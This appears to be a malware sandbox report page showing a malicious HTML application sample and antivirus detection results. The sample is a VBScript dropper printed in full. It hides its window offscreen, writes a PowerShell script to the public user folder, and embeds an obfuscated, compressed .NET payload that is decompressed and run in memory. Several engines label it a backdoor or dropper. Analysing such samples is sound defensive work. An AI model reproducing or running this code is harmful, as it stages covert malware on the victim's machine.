Static | ZeroBOX
No static analysis available.
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -7000,-7000
hdkl = "Scripting.FileSystemObject"
Set dd = CreateObject(hdkl)
vcx = "C:\Users\Public\install.ps1"
Set setsz = dd.CreateTextFile(vcx,True)
setsz.WriteLine "try"
setsz.WriteLine "{"
setsz.WriteLine "$HLHKDKRKTKHKCKDKED = @'"
setsz.WriteLine "jLcHWFPP1j4aihQREVCq0kE60nsREBQEpHdCVXqE0EsAlSa9S41SRQSkdyK9995C7yUCCaHzD/7OOd+5z3f/z72Tvfdaa2bNrHe9a2bn2WpGsQAcAACAi7lvbgCAWsA/TQ7w/90CMfd9+vr7gErCAcZarNcDjDq2dmCG966gd64WTgxWFs7OIDcGSxsGV3dnBjtnBkUNbQYnkLUNLzHxXZZ/rfHmBQDwGgsHEOTG9fvf6y4BsLGIsAgAAC1sAIDgnz46F4zO8G8PuX907H9wAwD/IwG/sf/2A/4OmwcDAA/+Xv8j/yP+tu732ADtv8lgJuH9vyT5FRtwDyPEMH5i/z84+U9j+A/0v40AY7/8L5vXzcbLDSNZNP+Vl9b/4P6vJcx5XcGuVrcG3n9h1Pl/OsphLl5XG0cQxvHevzD/Xcvof/nJ/y+cLv/43GLDBtwB1JpgAwLJAQCsvzYA7yumUFRi2P9r2v+t0bBjJuNxvgUw1BIBAOyYZe4CKKIwOwyLHftW52TDZse9VQCcAPJn2ABxwN9YpAAI5on78BrrLh43E8AVY7wfxszCZr+DcQZhkr4Lxsc8iPADb/3+8b7HBSDgxMwnf4YFIPoHL2ad201xlwuDgQmAfUsYLue/x3H+juP8Zxyb/d5fSHpgTKXw2IkxhhsGG3bgrQunPDYPnqs0BgcnNug+ZugWLw7ACPB3r5Gyk9ziwuyku3cpiLgU8PDT7hGASDEmMSGIDCOw/z6pb9m4y81ACHqIkeyYrPGw/0f91yg2ASc+pQERPl60nUDNQ87bfHABbJg4mNRJGQByWIC//N3lIsTBo8AHPbpdHY8C4w2iwKisRDxbmDm0GC5N/tkmpOyUt7CwXWUx4EFUtyFkMGGp/9JHAabByHtg2luoBIS3DOARUtiDHmNsQnJc+GMCbjwC0BOMNY/PjYf/j/av2ZykuJxYj295ZgbQSN/W8FanBXAr/6Pf8oNJDoApFCk2DhkARHcbG/8vs3icDzl
setsz.WriteLine "'@"
setsz.WriteLine "$jtwC = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::'FromBase64String'($HLHKDKRKTKHKCKDKED),[IO.Compression.CompressionMode]::Decompress)"
setsz.WriteLine "$H1 = New-Object Byte[](154624)"
setsz.WriteLine "$jtwC.Read($H1, 0, 154624) | Out-Null"
setsz.WriteLine "[Byte[]] $MyPt = [System.IO.Path]::([System.Threading.Thread]::'GetDomain'().'Load'($H1).'EntryPoint'.Invoke($Null,$Null))"
setsz.WriteLine "[Object[]] $Params=@($MyPt.Replace(""Framework64"",""Framework"") ,$H1)"
setsz.WriteLine "[System.Threading.Thread]::Sleep(1000)"
setsz.WriteLine "return $T.GetMethod('Run').Invoke($null, $Params)"
setsz.WriteLine "} catch { }"
setsz.Close
</script>
<body>
</body>
</HEAD>
</HTML>
Antivirus Signature
Bkav Clean
Lionic Clean
MicroWorld-eScan Clean
FireEye Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Arcabit Clean
BitDefenderTheta Clean
Cyren Clean
Symantec Clean
ESET-NOD32 Clean
Baidu Clean
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Clean
Kaspersky Backdoor.PowerShell.Agent.df
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Trojan.Injector/PS!1.D9B4 (CLASSIC)
Ad-Aware Clean
Emsisoft Clean
Comodo Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.HTML.Dropper.cg
CMC Clean
Sophos Clean
Jiangmin Clean
Avira Clean
MAX Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Microsoft Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
GData Clean
Cynet Clean
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
TACHYON Clean
Zoner Clean
Tencent Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
Panda Clean
No IRMA results available.